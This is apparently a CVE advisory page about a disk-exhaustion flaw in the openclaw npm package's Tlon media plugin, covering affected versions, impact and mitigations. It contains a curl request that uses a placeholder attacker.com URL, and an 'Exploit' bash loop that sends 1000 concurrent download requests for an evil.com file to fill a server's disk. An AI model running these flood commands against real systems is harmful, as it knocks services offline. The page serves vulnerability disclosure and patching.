openclaw, Media Downloads Bypass Core Safety Limits, low

Listen to this Post

How the CVE Works (around 20 lines)

The vulnerability resides in the Tlon media download handler of openclaw npm package versions ≤2026.3.28. The core safety limits—maximum file size per download, total download count per session, and automatic cleanup of temporary files—are not enforced when downloading media through a bundled plugin path. An attacker can craft a malicious request that triggers repeated media downloads without respecting these limits. Specifically, the plugin fails to invoke the `validateDownloadSize()` and `incrementDownloadCounter()` functions that are normally called in the main download flow. Additionally, the cleanup routine (scheduleTempCleanup()) is bypassed because the plugin registers downloads under a different namespace, causing the core’s disk usage tracker to ignore them. As a result, an unauthenticated user can flood the server with arbitrarily large or numerous media files, exhausting disk space. The exhaustion is availability-only (no privilege escalation or data corruption). The issue was fixed by modifying the plugin to delegate all download operations through the core’s safe handler and by adding a unified namespace check in the cleanup scheduler. The fix commit `2194587d70d2aef863508b945319c5a7c88b12ce` was merged and released in version 2026.3.31.

dailycve form

Platform: openclaw (npm)
Version: <=2026.3.28
Vulnerability: Disk exhaustion via media bypass
Severity: low
Date: 2026-03-31

Prediction: already patched (2026-03-31)

What Undercode Say:

Check installed openclaw version
npm list openclaw
Simulate bypass (test environment only)
curl -X POST http://target/media/download \
-H "Content-Type: application/json" \
-d '{"url":"http://attacker.com/largefile.bin","bypass":true}'
Monitor disk usage during attack
watch -n 1 'df -h /var/lib/openclaw'
Verify fix applied
npm update openclaw
npm list openclaw | grep 2026.3.31

Exploit:

Send repeated POST requests to the vulnerable media endpoint with a large file URL. The plugin does not enforce size or count limits, and no cleanup runs. After ~500 requests of 100MB each, disk fills. Example loop:

for i in {1..1000}; do
curl -s -X POST http://target/media/download -d '{"url":"http://evil.com/100M.bin"}' &
done

Protection from this CVE

  • Upgrade to openclaw >=2026.3.31 immediately.
  • If unable to upgrade, disable the Tlon media plugin via openclaw config set plugins.tlon.enabled false.
  • Implement network-level rate limiting on `/media/download` endpoint.
  • Set disk quotas for the openclaw user (e.g., setquota -u openclaw 5G 6G 0 0 /var).
  • Monitor disk usage with `inotify` and auto-kill processes exceeding thresholds.

Impact

  • Availability: Complete disk exhaustion leading to service crash, inability to write logs, and potential host instability.
  • Scope: Only affects installations with the Tlon plugin enabled (default in versions ≤2026.3.28).
  • No data loss or privilege escalation – purely a resource exhaustion DoS.
  • Recovery: Requires manual cleanup of downloaded files and service restart after patching.

🎯Let’s Practice Exploiting & Learn Patching For Free:

Sources:

Reported By: github.com
Extra Source Hub:
Undercode

🔐JOIN OUR CYBER WORLD [ CVE News • HackMonitor • UndercodeNews ]

💬 Whatsapp | 💬 Telegram

📢 Follow DailyCVE & Stay Tuned:

𝕏 formerly Twitter 🐦 | @ Threads | 🔗 Linkedin Featured Image

Scroll to Top